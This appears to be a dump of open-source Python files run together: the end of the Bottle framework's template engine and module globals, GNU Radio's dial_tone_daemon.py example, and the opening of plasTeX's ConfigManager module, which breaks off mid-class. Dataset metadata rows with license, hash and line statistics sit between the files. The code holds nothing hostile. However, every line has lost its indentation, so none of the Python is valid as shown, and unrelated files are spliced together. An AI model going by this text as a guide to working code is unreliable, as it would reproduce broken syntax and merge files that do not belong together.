def prepare(self, escape_func=html_escape, noescape=False, syntax=None, **ka):
self.cache = {}
enc = self.encoding
self._str = lambda x: touni(x, enc)
self._escape = lambda x: escape_func(touni(x, enc))
self.syntax = syntax
if noescape:
self._str, self._escape = self._escape, self._str
@cached_property
def co(self):
return compile(self.code, self.filename or '<string>', 'exec')
@cached_property
def code(self):
source = self.source
if not source:
with open(self.filename, 'rb') as f:
source = f.read()
try:
source, encoding = touni(source), 'utf8'
except UnicodeError:
depr('Template encodings other than utf8 are no longer supported.') #0.11
source, encoding = touni(source, 'latin1'), 'latin1'
parser = StplParser(source, encoding=encoding, syntax=self.syntax)
code = parser.translate()
self.encoding = parser.encoding
return code
def _rebase(self, _env, _name=None, **kwargs):
if _name is None:
depr('Rebase function called without arguments.'
' You were probably looking for {{base}}?', True) #0.12
_env['_rebase'] = (_name, kwargs)
def _include(self, _env, _name=None, **kwargs):
if _name is None:
depr('Rebase function called without arguments.'
' You were probably looking for {{base}}?', True) #0.12
env = _env.copy()
env.update(kwargs)
if _name not in self.cache:
self.cache[_name] = self.__class__(name=_name, lookup=self.lookup)
return self.cache[_name].execute(env['_stdout'], env)
def execute(self, _stdout, kwargs):
env = self.defaults.copy()
env.update(kwargs)
env.update({'_stdout': _stdout, '_printlist': _stdout.extend,
'include': functools.partial(self._include, env),
'rebase': functools.partial(self._rebase, env), '_rebase': None,
'_str': self._str, '_escape': self._escape, 'get': env.get,
'setdefault': env.setdefault, 'defined': env.__contains__ })
eval(self.co, env)
if env.get('_rebase'):
subtpl, rargs = env.pop('_rebase')
rargs['base'] = ''.join(_stdout) #copy stdout
del _stdout[:] # clear stdout
return self._include(env, subtpl, **rargs)
return env
def render(self, *args, **kwargs):
""" Render the template using keyword arguments as local variables. """
env = {}; stdout = []
for dictarg in args: env.update(dictarg)
env.update(kwargs)
self.execute(stdout, env)
return ''.join(stdout)
class StplSyntaxError(TemplateError): pass
class StplParser(object):
''' Parser for stpl templates. '''
_re_cache = {} #: Cache for compiled re patterns
# This huge pile of voodoo magic splits python code into 8 different tokens.
# 1: All kinds of python strings (trust me, it works)
_re_tok = '([urbURB]?(?:\'\'(?!\')|""(?!")|\'{6}|"{6}' \
'|\'(?:[^\\\\\']|\\\\.)+?\'|"(?:[^\\\\"]|\\\\.)+?"' \
'|\'{3}(?:[^\\\\]|\\\\.|\\n)+?\'{3}' \
'|"{3}(?:[^\\\\]|\\\\.|\\n)+?"{3}))'
_re_inl = _re_tok.replace('|\\n','') # We re-use this string pattern later
# 2: Comments (until end of line, but not the newline itself)
_re_tok += '|(#.*)'
# 3,4: Open and close grouping tokens
_re_tok += '|([\\[\\{\\(])'
_re_tok += '|([\\]\\}\\)])'
# 5,6: Keywords that start or continue a python block (only start of line)
_re_tok += '|^([ \\t]*(?:if|for|while|with|try|def|class)\\b)' \
'|^([ \\t]*(?:elif|else|except|finally)\\b)'
# 7: Our special 'end' keyword (but only if it stands alone)
_re_tok += '|((?:^|;)[ \\t]*end[ \\t]*(?=(?:%(block_close)s[ \\t]*)?\\r?$|;|#))'
# 8: A customizable end-of-code-block template token (only end of line)
_re_tok += '|(%(block_close)s[ \\t]*(?=\\r?$))'
# 9: And finally, a single newline. The 10th token is 'everything else'
_re_tok += '|(\\r?\\n)'
# Match the start tokens of code areas in a template
_re_split = '(?m)^[ \t]*(\\\\?)((%(line_start)s)|(%(block_start)s))(%%?)'
# Match inline statements (may contain python strings)
_re_inl = '(?m)%%(inline_start)s((?:%s|[^\'"\n]*?)+)%%(inline_end)s' % _re_inl
_re_tok = '(?m)' + _re_tok
default_syntax = '<% %> % {{ }}'
def __init__(self, source, syntax=None, encoding='utf8'):
self.source, self.encoding = touni(source, encoding), encoding
self.set_syntax(syntax or self.default_syntax)
self.code_buffer, self.text_buffer = [], []
self.lineno, self.offset = 1, 0
self.indent, self.indent_mod = 0, 0
self.paren_depth = 0
def get_syntax(self):
''' Tokens as a space separated string (default: <% %> % {{ }}) '''
return self._syntax
def set_syntax(self, syntax):
self._syntax = syntax
self._tokens = syntax.split()
if not syntax in self._re_cache:
names = 'block_start block_close line_start inline_start inline_end'
etokens = map(re.escape, self._tokens)
pattern_vars = dict(zip(names.split(), etokens))
patterns = (self._re_split, self._re_tok, self._re_inl)
patterns = [re.compile(p%pattern_vars) for p in patterns]
self._re_cache[syntax] = patterns
self.re_split, self.re_tok, self.re_inl = self._re_cache[syntax]
syntax = property(get_syntax, set_syntax)
def translate(self):
if self.offset: raise RuntimeError('Parser is a one time instance.')
while True:
m = self.re_split.search(self.source[self.offset:])
if m:
text = self.source[self.offset:self.offset+m.start()]
self.text_buffer.append(text)
self.offset += m.end()
if m.group(1): # New escape syntax
line, sep, _ = self.source[self.offset:].partition('\n')
self.text_buffer.append(m.group(2)+m.group(5)+line+sep)
self.offset += len(line+sep)+1
continue
elif m.group(5): # Old escape syntax
depr('Escape code lines with a backslash.') #0.12
line, sep, _ = self.source[self.offset:].partition('\n')
self.text_buffer.append(m.group(2)+line+sep)
self.offset += len(line+sep)+1
continue
self.flush_text()
self.read_code(multiline=bool(m.group(4)))
else: break
self.text_buffer.append(self.source[self.offset:])
self.flush_text()
return ''.join(self.code_buffer)
def read_code(self, multiline):
code_line, comment = '', ''
while True:
m = self.re_tok.search(self.source[self.offset:])
if not m:
code_line += self.source[self.offset:]
self.offset = len(self.source)
self.write_code(code_line.strip(), comment)
return
code_line += self.source[self.offset:self.offset+m.start()]
self.offset += m.end()
_str, _com, _po, _pc, _blk1, _blk2, _end, _cend, _nl = m.groups()
if (code_line or self.paren_depth > 0) and (_blk1 or _blk2): # a if b else c
code_line += _blk1 or _blk2
continue
if _str: # Python string
code_line += _str
elif _com: # Python comment (up to EOL)
comment = _com
if multiline and _com.strip().endswith(self._tokens[1]):
multiline = False # Allow end-of-block in comments
elif _po: # open parenthesis
self.paren_depth += 1
code_line += _po
elif _pc: # close parenthesis
if self.paren_depth > 0:
# we could check for matching parentheses here, but it's
# easier to leave that to python - just check counts
self.paren_depth -= 1
code_line += _pc
elif _blk1: # Start-block keyword (if/for/while/def/try/...)
code_line, self.indent_mod = _blk1, -1
self.indent += 1
elif _blk2: # Continue-block keyword (else/elif/except/...)
code_line, self.indent_mod = _blk2, -1
elif _end: # The non-standard 'end'-keyword (ends a block)
self.indent -= 1
elif _cend: # The end-code-block template token (usually '%>')
if multiline: multiline = False
else: code_line += _cend
else: # \n
self.write_code(code_line.strip(), comment)
self.lineno += 1
code_line, comment, self.indent_mod = '', '', 0
if not multiline:
break
def flush_text(self):
text = ''.join(self.text_buffer)
del self.text_buffer[:]
if not text: return
parts, pos, nl = [], 0, '\\\n'+' '*self.indent
for m in self.re_inl.finditer(text):
prefix, pos = text[pos:m.start()], m.end()
if prefix:
parts.append(nl.join(map(repr, prefix.splitlines(True))))
if prefix.endswith('\n'): parts[-1] += nl
parts.append(self.process_inline(m.group(1).strip()))
if pos < len(text):
prefix = text[pos:]
lines = prefix.splitlines(True)
if lines[-1].endswith('\\\\\n'): lines[-1] = lines[-1][:-3]
elif lines[-1].endswith('\\\\\r\n'): lines[-1] = lines[-1][:-4]
parts.append(nl.join(map(repr, lines)))
code = '_printlist((%s,))' % ', '.join(parts)
self.lineno += code.count('\n')+1
self.write_code(code)
def process_inline(self, chunk):
if chunk[0] == '!': return '_str(%s)' % chunk[1:]
return '_escape(%s)' % chunk
def write_code(self, line, comment=''):
line, comment = self.fix_backward_compatibility(line, comment)
code = ' ' * (self.indent+self.indent_mod)
code += line.lstrip() + comment + '\n'
self.code_buffer.append(code)
def fix_backward_compatibility(self, line, comment):
parts = line.strip().split(None, 2)
if parts and parts[0] in ('include', 'rebase'):
depr('The include and rebase keywords are functions now.') #0.12
if len(parts) == 1: return "_printlist([base])", comment
elif len(parts) == 2: return "_=%s(%r)" % tuple(parts), comment
else: return "_=%s(%r, %s)" % tuple(parts), comment
if self.lineno <= 2 and not line.strip() and 'coding' in comment:
m = re.match(r"#.*coding[:=]\s*([-\w.]+)", comment)
if m:
depr('PEP263 encoding strings in templates are deprecated.') #0.12
enc = m.group(1)
self.source = self.source.encode(self.encoding).decode(enc)
self.encoding = enc
return line, comment.replace('coding','coding*')
return line, comment
def template(*args, **kwargs):
'''
Get a rendered template as a string iterator.
You can use a name, a filename or a template string as first parameter.
Template rendering arguments can be passed as dictionaries
or directly (as keyword arguments).
'''
tpl = args[0] if args else None
adapter = kwargs.pop('template_adapter', SimpleTemplate)
lookup = kwargs.pop('template_lookup', TEMPLATE_PATH)
tplid = (id(lookup), tpl)
if tplid not in TEMPLATES or DEBUG:
settings = kwargs.pop('template_settings', {})
if isinstance(tpl, adapter):
TEMPLATES[tplid] = tpl
if settings: TEMPLATES[tplid].prepare(**settings)
elif "\n" in tpl or "{" in tpl or "%" in tpl or '$' in tpl:
TEMPLATES[tplid] = adapter(source=tpl, lookup=lookup, **settings)
else:
TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings)
if not TEMPLATES[tplid]:
abort(500, 'Template (%s) not found' % tpl)
for dictarg in args[1:]: kwargs.update(dictarg)
return TEMPLATES[tplid].render(kwargs)
mako_template = functools.partial(template, template_adapter=MakoTemplate)
cheetah_template = functools.partial(template, template_adapter=CheetahTemplate)
jinja2_template = functools.partial(template, template_adapter=Jinja2Template)
def view(tpl_name, **defaults):
''' Decorator: renders a template for a handler.
The handler can control its behavior like that:
- return a dict of template vars to fill out the template
- return something other than a dict and the view decorator will not
process the template, but return the handler result as is.
This includes returning a HTTPResponse(dict) to get,
for instance, JSON with autojson or other castfilters.
'''
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
result = func(*args, **kwargs)
if isinstance(result, (dict, DictMixin)):
tplvars = defaults.copy()
tplvars.update(result)
return template(tpl_name, **tplvars)
elif result is None:
return template(tpl_name, defaults)
return result
return wrapper
return decorator
mako_view = functools.partial(view, template_adapter=MakoTemplate)
cheetah_view = functools.partial(view, template_adapter=CheetahTemplate)
jinja2_view = functools.partial(view, template_adapter=Jinja2Template)
###############################################################################
# Constants and Globals ########################################################
###############################################################################
TEMPLATE_PATH = ['./', './views/']
TEMPLATES = {}
DEBUG = False
NORUN = False # If set, run() does nothing. Used by load_app()
#: A dict to map HTTP status codes (e.g. 404) to phrases (e.g. 'Not Found')
HTTP_CODES = httplib.responses
HTTP_CODES[418] = "I'm a teapot" # RFC 2324
HTTP_CODES[422] = "Unprocessable Entity" # RFC 4918
HTTP_CODES[428] = "Precondition Required"
HTTP_CODES[429] = "Too Many Requests"
HTTP_CODES[431] = "Request Header Fields Too Large"
HTTP_CODES[511] = "Network Authentication Required"
_HTTP_STATUS_LINES = dict((k, '%d %s'%(k,v)) for (k,v) in HTTP_CODES.items())
#: The default template used for error pages. Override with @error()
ERROR_PAGE_TEMPLATE = """
%%try:
%%from %s import DEBUG, HTTP_CODES, request, touni
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: {{e.status}}</title>
<style type="text/css">
html {background-color: #eee; font-family: sans;}
body {background-color: #fff; border: 1px solid #ddd;
padding: 15px; margin: 15px;}
pre {background-color: #eee; border: 1px solid #ddd; padding: 5px;}
</style>
</head>
<body>
<h1>Error: {{e.status}}</h1>
<p>Sorry, the requested URL <tt>{{repr(request.url)}}</tt>
caused an error:</p>
<pre>{{e.body}}</pre>
%%if DEBUG and e.exception:
<h2>Exception:</h2>
<pre>{{repr(e.exception)}}</pre>
%%end
%%if DEBUG and e.traceback:
<h2>Traceback:</h2>
<pre>{{e.traceback}}</pre>
%%end
</body>
</html>
%%except ImportError:
<b>ImportError:</b> Could not generate the error page. Please add bottle to
the import path.
%%end
""" % __name__
#: A thread-safe instance of :class:`LocalRequest`. If accessed from within a
#: request callback, this instance always refers to the *current* request
#: (even on a multithreaded server).
request = LocalRequest()
#: A thread-safe instance of :class:`LocalResponse`. It is used to change the
#: HTTP response for the *current* request.
response = LocalResponse()
#: A thread-safe namespace. Not used by Bottle.
local = threading.local()
# Initialize app stack (create first empty Bottle app)
# BC: 0.6.4 and needed for run()
app = default_app = AppStack()
app.push()
#: A virtual package that redirects import statements.
#: Example: ``import bottle.ext.sqlite`` actually imports `bottle_sqlite`.
ext = _ImportRedirect('bottle.ext' if __name__ == '__main__' else __name__+".ext", 'bottle_%s').module
if __name__ == '__main__':
opt, args, parser = _cmd_options, _cmd_args, _cmd_parser
if opt.version:
_stdout('Bottle %s\n'%__version__)
sys.exit(0)
if not args:
parser.print_help()
_stderr('\nError: No application specified.\n')
sys.exit(1)
sys.path.insert(0, '.')
sys.modules.setdefault('bottle', sys.modules['__main__'])
host, port = (opt.bind or 'localhost'), 8080
if ':' in host and host.rfind(']') < host.rfind(':'):
host, port = host.rsplit(':', 1)
host = host.strip('[]')
run(args[0], host=host, port=int(port), server=opt.server,
reloader=opt.reload, plugins=opt.plugin, debug=opt.debug)
# THE END
| gpl-3.0 | -3,736,979,175,166,978,000 | 38.931053 | 103 | 0.578377 | false |
douggeiger/gnuradio | gr-audio/examples/python/dial_tone_daemon.py | 58 | 2196 | #!/usr/bin/env python
#
# Copyright 2004,2005,2007,2008,2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gru
from gnuradio import audio
from gnuradio.eng_option import eng_option
from optparse import OptionParser
import os
try:
from gnuradio import analog
except ImportError:
sys.stderr.write("Error: Program requires gr-analog.\n")
sys.exit(1)
class my_top_block(gr.top_block):
def __init__(self):
gr.top_block.__init__(self)
parser = OptionParser(option_class=eng_option)
parser.add_option("-O", "--audio-output", type="string", default="",
help="pcm output device name. E.g., hw:0,0 or /dev/dsp")
parser.add_option("-r", "--sample-rate", type="eng_float", default=48000,
help="set sample rate to RATE (48000)")
(options, args) = parser.parse_args()
if len(args) != 0:
parser.print_help()
raise SystemExit, 1
sample_rate = int(options.sample_rate)
ampl = 0.1
src0 = analog.sig_source_f(sample_rate, analog.GR_SIN_WAVE, 350, ampl)
src1 = analog.sig_source_f(sample_rate, analog.GR_SIN_WAVE, 440, ampl)
dst = audio.sink(sample_rate, options.audio_output)
self.connect(src0, (dst, 0))
self.connect(src1, (dst, 1))
if __name__ == '__main__':
pid = gru.daemonize()
print "To stop this program, enter 'kill %d'" % pid
my_top_block().run()
| gpl-3.0 | -6,660,296,773,033,275,000 | 34.419355 | 83 | 0.65847 | false |
mungerd/plastex | plasTeX/ConfigManager/__init__.py | 7 | 60231 | #!/usr/bin/env python
"""
ConfigManager
ConfigManager is a combination command-line option parser and configuration
file. It essentially combines ConfigParser, getopt, and a lot of
additional logic to parse the command-line the way you expect it to be
parsed. The ConfigManager class should be backwards compatible with the
ConfigParser class, but contains much more functionality and a more natural
dictionary-style interface to sections and options.
See examples at the bottom of this file. Try typing __init__.py
followed by a bunch of imaginary command line options and arguments.
"""
import sys, string, re, urllib, copy, types, os
from plasTeX.dictutils import ordereddict
from UserList import UserList
from UserDict import UserDict
from textwrap import wrap
__all__ = ['ConfigManager','BooleanOption','IntegerOption','CompoundOption',
'MultiOption','GenericOption','FloatOption','StringOption',
'InputFileOption','OutputFileOption','InputDirectoryOption',
'OutputDirectoryOption','CountedOption',
'BooleanArgument','IntegerArgument','CompoundArgument',
'MultiArgument','GenericArgument','FloatArgument','StringArgument',
'InputFileArgument','OutputFileArgument','InputDirectoryArgument',
'OutputDirectoryArgument','CountedArgument',
'BUILTIN','CODE','REGISTRY','CONFIG','CONFIGFILE','ENVIRON',
'ENVIRONMENT','COMMANDLINE','ALL','DEFAULTSECT',
'ON','OFF','TRUE','FALSE','YES','NO','CommandLineManager',
'GetoptError','ConfigError','NoOptionError']
DEFAULTSECT = "DEFAULT"
MAX_INTERPOLATION_DEPTH = 10
ON = TRUE = YES = 1
OFF = FALSE = NO = 0
TERMINAL_WIDTH = 76 # Maximum width of terminal
MAX_NAME_WIDTH_RATIO = 0.25 # Max fraction of terminal to use for option
PREPAD = 2 # Padding before each option name in usage
GUTTER = 4 # Space between option name and description in usage
# Possible values for `source'.
BUILTIN = 2
CODE = 4
REGISTRY = 8
CONFIG = CONFIGFILE = 16
ENVIRON = ENVIRONMENT = 32
COMMANDLINE = 64
ALL = 0xffffff
# Exception classes
class Error(Exception):
""" Generic exception """
def __init__(self, msg=''):
self.msg = msg
Exception.__init__(self, msg)
def __str__(self):
return self.msg
__repr__ = __str__
# Exceptions while parsing command line
class GetoptError(Error):
""" Generic command line exception """
def __init__(self, msg, opt):
self.msg = msg
self.opt = opt
Exception.__init__(self, msg, opt)
def __str__(self):
return self.msg
__repr__ = __str__
class RequiresArgument(GetoptError):
""" Exception for a missing argument """
class MandatoryOption(GetoptError):
""" Exception for a missing option """
class UnspecifiedArgument(GetoptError):
""" Exception for an argument when none was expected """
class UnrecognizedArgument(GetoptError):
""" Exception for an argument that is unrecognized """
class NonUniquePrefix(GetoptError):
""" Exception for multiple option prefixes that match a given option """
class UnknownCompoundGroup(GetoptError):
""" Exception for an unknown grouping character used for a compound """
def __init__(self, msg=''):
GetoptError.__init__(self, msg, '')
# Exceptions while reading/parsing configuration files
class ConfigError(Error):
""" Generic configuration file exception """
class NoSectionError(ConfigError):
""" Exception for missing sections """
def __init__(self, section):
ConfigError.__init__(self, 'No section: %s' % section)
self.section = section
class DuplicateSectionError(ConfigError):
""" Exception for duplicate sections """
def __init__(self, section):
ConfigError.__init__(self, "Section %s already exists" % section)
self.section = section
class InvalidOptionError(GetoptError, ConfigError):
""" Exception for invalid values for a given option """
def __init__(self, option, value, msg='', type=''):
if type: type += ' '
if not msg:
msg="Invalid value for %soption `%s'" % (type, option)
ConfigError.__init__(self, msg+': %s' % value)
self.option = option
self.value = value
class NoOptionError(ConfigError):
""" Exception for missing a missing option in a section """
def __init__(self, option, section):
ConfigError.__init__(self, "No option `%s' in section: %s" %
(option, section))
self.option = option
self.section = section
class InterpolationError(ConfigError):
""" Exception for message interpolation errors """
def __init__(self, reference, option, section, rawval):
ConfigError.__init__(self,
"Bad value substitution:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\tkey : %s\n"
"\trawval : %s\n"
% (section, option, reference, rawval))
self.reference = reference
self.option = option
self.section = section
class InterpolationDepthError(ConfigError):
""" Exception for excessive recursion in interpolation """
def __init__(self, option, section, rawval):
ConfigError.__init__(self,
"Value interpolation too deeply recursive:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\trawval : %s\n"
% (section, option, rawval))
self.option = option
self.section = section
class ParsingError(ConfigError):
""" Exception for errors occurring during parsing of a config file """
def __init__(self, filename):
ConfigError.__init__(self, 'File contains parsing errors: %s' % filename)
self.filename = filename
self.errors = []
def append(self, lineno, line):
self.errors.append((lineno, line))
self.msg = self.msg + '\n\t[line %2d]: %s' % (lineno, line)
class TooFewValues(GetoptError):
""" Got fewer values than expected """
def __init__(self, msg):
GetoptError.__init__(self, msg, '')
class TooManyValues(GetoptError):
""" Got more values than expected """
def __init__(self, msg):
GetoptError.__init__(self, msg, '')
class MissingSectionHeaderError(ParsingError):
""" Exception for options that occur before a section heading """
def __init__(self, filename, lineno, line):
ConfigError.__init__(
self,
'File contains no section headers.\nfile: %s, line: %d\n%s' %
(filename, lineno, line))
self.filename = filename
self.lineno = lineno
self.line = line
class ConfigSection(UserDict, object):
""" Section of a configuration object """
def __init__(self, name, data={}):
"""
Initialize the section
Required Arguments:
name -- name of the section
data -- dictionary containing the initial set of options
"""
UserDict.__init__(self, data)
self.name = name
self.parent = None
def copy(self):
""" Make a deep copy of self """
newcopy = self.__class__(self.name)
for key, value in vars(self).items():
if key == 'data': continue
setattr(newcopy, key, value)
for key, value in self.data.items():
newcopy.data[key] = value.copy()
return newcopy
def setParent(self, parent):
""" Set the parent ConfigManager instance """
self.parent = parent
def defaults(self):
""" Return the dictionary of defaults """
return self.parent.defaults()
def __getitem__(self, key):
""" Return the value of the option, not the option itself """
return self.get(key)
def set(self, option, value, source=BUILTIN):
"""
Create the appropriate option type
If the value is already an Option instance, just plug it in.
If the value is anything else, try to figure out which option
type it corresponds to and create an option of that type.
Required Arguments:
option -- dictionary key where the option should be set
value -- option value to store
source -- flag to indicate source of option
Returns: None
"""
typemap = {str:StringOption, int:IntegerOption,
float:FloatOption, list:MultiOption, tuple:MultiOption}
if self.data.has_key(option):
if self.data[option].source <= source:
self.data[option].source = source
self.data[option].setValue(value)
else:
if isinstance(value, GenericOption):
value.setParent(self)
value.name = str(option)
self.data[option] = value
elif type(value) in typemap.keys():
for key, opttype in typemap.items():
if isinstance(value, key):
# Handle booleans this way until support for
# true booleans shows up in Python.
if type(value) == str and \
str(value).lower().strip() in ['on','off','true','false','yes','no']:
opttype = BooleanOption
self.data[option] = opttype(name=option, source=source)
self.data[option].setParent(self)
self.data[option].name = str(option)
self.data[option].setValue(value)
break
else:
raise TypeError, \
'Could not find valid option type for "%s"' % value
def __setitem__(self, key, value):
""" Set the item in the dictionary """
self.set(key, value, source=BUILTIN)
def getint(self, option):
""" Get the option value and cast it to an integer """
return int(self[option])
def getfloat(self, option):
""" Get the option value and cast it to a float """
return float(self[option])
def getboolean(self, option):
""" Get the option value and cast it to a boolean """
v = self[option]
val = int(v)
if val not in (0, 1):
raise ValueError, 'Not a boolean: %s' % v
return val
def get(self, option, raw=0, vars={}):
"""
Get an option value for a given section.
All % interpolations are expanded in the return values, based on the
defaults passed into the constructor, unless the optional argument
`raw' is true. Additional substitutions may be provided using the
`vars' argument, which must be a dictionary whose contents overrides
any pre-existing defaults.
Required Arguments:
option -- name of the option to retrieve
Keyword Arguments:
raw -- boolean flag that indicates whether string values should
be returned as a raw value or as a string with all variable
interpolation applied
vars -- dictionary of values to use in string interpolation
Returns:
value of the option
"""
value = self.getraw(option, vars)
# Raw was specified
if raw or value == None: return value
# If we have a list, see if any strings need interpolation.
if type(value) in [list, tuple]:
strings = [s for s in value
if isinstance(s,str) and s.find('%(')+1]
if not strings: return value
# If we have a string, but no interpolation is needed, bail out.
elif not(isinstance(value,str)) or value.find("%(") < 0:
return value
# otherwise needs interpolation...
var_dict = self.defaults().data.copy()
var_dict.update(self.data)
var_dict.update(vars)
# Handle lists of interpolations as well as single values.
if type(value) in [list, tuple]:
new_values = []
for i in value:
new_values.append(self.interpolate(option, var_dict, i))
return new_values
else:
return self.interpolate(option, var_dict, value)
def interpolate(self, option, vars, rawval):
"""
Do the string interpolation
Required Arguments:
option -- name of the option
vars -- dictionary of values to use in interpolation
rawval -- raw value of the option
Returns:
string -- string with all variables interpolated
"""
value = rawval
depth = 0
# Loop through this until it's done
while depth < MAX_INTERPOLATION_DEPTH:
depth = depth + 1
if value.find("%(") >= 0:
try:
value = value % vars
except KeyError, key:
raise InterpolationError(key, option, self.name, rawval)
else:
break
if value.find("%(") >= 0:
raise InterpolationDepthError(option, self.name, rawval)
return value
def getraw(self, option, vars={}):
"""
Return raw value of option
Required Arguments:
option -- name of the option to retrieve
Keyword Arguments:
vars -- dictionary containing additional default values
"""
if vars.has_key(option):
return vars[option].getValue()
if self.has_key(option):
return self.data[option].getValue()
defaults = self.defaults()
if defaults.has_key(option):
return defaults.data[option].getValue()
raise NoOptionError(option, self.name)
def to_string(self, source=COMMANDLINE):
"""
Convert the section back into INI format
Keyword Arguments:
source -- flag which indicates which source of information to print
Returns:
string -- string containing the section in INI format
"""
s = ''
keys = self.keys()
keys.sort()
for key in keys:
if source & self.data[key].source:
raw = self.getraw(key)
option = self.data[key]
# Bypass unset options
if isinstance(option, MultiOption) and raw == []: continue
if raw == None: continue
# Print description or summary of the option as well
comment = ''
if option.summary: comment = option.summary
if option.description: comment = option.description
if comment:
comment = comment.strip() % option.names()
comment = comment.split('\n')
s += '\n; %s\n' % '\n; '.join(comment)
value = str(option).replace('\n', '\n ')
if value.find('\n') + 1: value = '\n ' + value
s += "%s %s %s\n" % (key, ConfigManager.OPTIONSEP, value)
return s
def __str__(self):
""" Return section in INI format without builtins """
return self.to_string()
def __repr__(self):
""" Return section in INI format with builtins """
return self.to_string(ALL)
class ConfigManager(UserDict, object):
# Regular expressions for parsing section headers and options.
SECTCRE = re.compile(
r'\[' # [
r'(?P<header>[^]]+)' # very permissive!
r'\]' # ]
)
OPTCRE = re.compile(
r'(?P<option>[]\-[\w_.*,(){}]+)' # a lot of stuff found by IvL
r'[ \t]*(?P<vi>[:=])[ \t]*' # any number of space/tab,
# followed by separator
# (either : or =), followed
# by any # space/tab
r'(?P<value>.*)$' # everything up to eol
)
# Option separator used in printing out INI format
OPTIONSEP = '='
# Set prefixes for options. If these are the same, all options
# are treated as long options. You can set either one to None
# to turn that type of option off as well.
short_prefix = '-'
long_prefix = '--'
def __init__(self, defaults={}):
"""
Initialize ConfigManager
Keyword Arguments:
defaults -- dictionary of default values. These values will
make up the section by the name DEFAULTSECT.
"""
UserDict.__init__(self)
self[DEFAULTSECT] = ConfigSection(DEFAULTSECT, defaults)
self.strict = 1 # Raise exception for unknown options
self._categories = {} # Dictionary of option categories
self.unrecognized = []
def copy(self):
""" Make a deep copy of self """
newcopy = self.__class__()
for key, value in vars(self).items():
if key == 'data': continue
setattr(newcopy, key, value)
for key, value in self.data.items():
newcopy.data[key] = value.copy()
return newcopy
def set_prefixes(cls, arg1, arg2=None):
"""
Set the command-line option prefixes
Arguments:
short - prefix to use for short command-line options. If this
is set to 'None', then all options are treated as long options.
long - prefix to use for long options
"""
if arg1 == arg2 == None:
raise ValueError, 'Short and long prefixes cannot both be None.'
if arg2 is None:
cls.long_prefix = arg1
cls.short_prefix = None
else:
cls.long_prefix = arg2
cls.short_prefix = arg1
set_prefixes = classmethod(set_prefixes)
def add_help_on_option(self, category=None):
"""
Add a --help-on=LIST option for displaying specific option help
The --help-on= option can be added to give the command line
interactive help. For example, if you had an option called
'--debug', you could type '--help-on debug' to get the full
description of the --debug option printed out.
Keyword Arguments:
category -- category to put the --help-on option in
"""
self[DEFAULTSECT]['__help_on__'] = MultiOption(
""" Display help on listed option names """,
options = '%shelp-on' % self.long_prefix[0],
category = category,
callback = self.usage_on,
)
def remove_help_on_option(self):
""" Remove the --help-on option """
try: del self[DEFAULTSECT]['__help_on__']
except: pass
def add_category(self, key, title):
"""
Add a category to the ConfigManager
Options can be grouped by categories for display in the usage
message. Categories have both a key and a title. The key is
what is used in the 'category' parameter when instantiating an
option. The title is the heading to print in the usage message.
Required Arguments:
key -- name of the category used in instantiating an option
title -- title of the category to print in the usage message
Returns:
string -- the same key given as the first argument
"""
# if not self._categories:
# self._categories['__categories__'] = 'Help Categories'
# if not self.has_key('__categories__'):
# self.add_section('__categories__')
# self['__categories__'][key] = BooleanOption(title,
# options='%shelp-%s' % (self.long_prefix, key),
# category='__categories__')
self._categories[key] = title
return key
def get_category(self, key):
""" Return the title of the given category """
if type(key) not in [list, tuple]:
key = [key]
if not key:
return ''
return self._categories[key[0]]
def categories(self):
""" Return the dictionary of categories """
return self._categories
def set_strict(self, bool=1):
"""
Parse the command line strictly
If you do not want to be bothered with errors due to unrecognized
arguments, this method can be called with a boolean 'false'.
This is very useful if your program is actually a wrapper around
another program and you do not want to declare all of its options
in your ConfigManager. The ConfigManager will simply make its best
guess as to whether the option accepts a value and what type the
option is.
Keyword Arguments:
bool -- flag indicating whether parsing should be strict or not
"""
self.strict = not(not(bool))
def defaults(self):
""" Return a dictionary of defaults """
return self[DEFAULTSECT]
def sections(self):
""" Return a list of section names """
return self.keys()
def add_section(self, section):
"""
Create a new section in the configuration.
Do nothing if a section by the specified name already exists.
Required Arguments:
section -- name of the section to create
Returns:
instance -- a ConfigSection instance with the given name is returned
"""
if self.has_key(section): return self[section]
self[section] = ConfigSection(section)
return self[section]
def has_section(self, section):
""" Indicate whether the named section is present """
return section in self.keys()
def options(self, section):
""" Return a list of option names for the given section name """
if self.has_key(section):
return self[section].keys()
else:
raise NoSectionError(section)
def read(self, filenames):
"""
Read and parse a filename or a list of filenames
Files that cannot be opened are silently ignored; this is
designed so that you can specify a list of potential
configuration file locations (e.g. current directory, user's
home directory, systemwide directory), and all existing
configuration files in the list will be read. A single
filename may also be given.
"""
if type(filenames) in [type(''), type(u'')]:
filenames = [filenames]
for filename in filenames:
try:
if filename.startswith('~'):
filename = os.path.expanduser(filename)
fp = urllib.urlopen(filename)
except (OSError, IOError):
continue
self.__read(fp, filename)
fp.close()
return self
def readfp(self, fp, filename=None):
"""
Like read() but the argument must be a file-like object.
The 'fp' argument must have a 'readline' method. Optional
second argument is the 'filename', which if not given, is
taken from fp.name. If fp has no 'name' attribute, '<???>' is
used.
Required Arguments:
fp -- file-type like object
filename -- name of the file in 'fp'
Returns:
string -- contents of the file pointer
"""
if filename is None:
try:
filename = fp.name
except AttributeError:
filename = '<???>'
self.__read(fp, filename)
return self
def get(self, section, option, raw=0, vars={}):
""" Get an option value for a given section """
return self[section].get(option, raw, vars)
def set(self, section, option, value, source=BUILTIN):
""" Set an option value """
if not section or section == DEFAULTSECT:
sectdict = self[DEFAULTSECT]
else:
try:
sectdict = self[section]
except KeyError:
raise NoSectionError(section)
sectdict.set(option, value, source)
def __setitem__(self, key, value):
""" Add a section to the configuration """
if isinstance(value, ConfigSection):
self.data[key] = value
self.data[key].setParent(self)
else:
self.data[key] = ConfigSection(str(key))
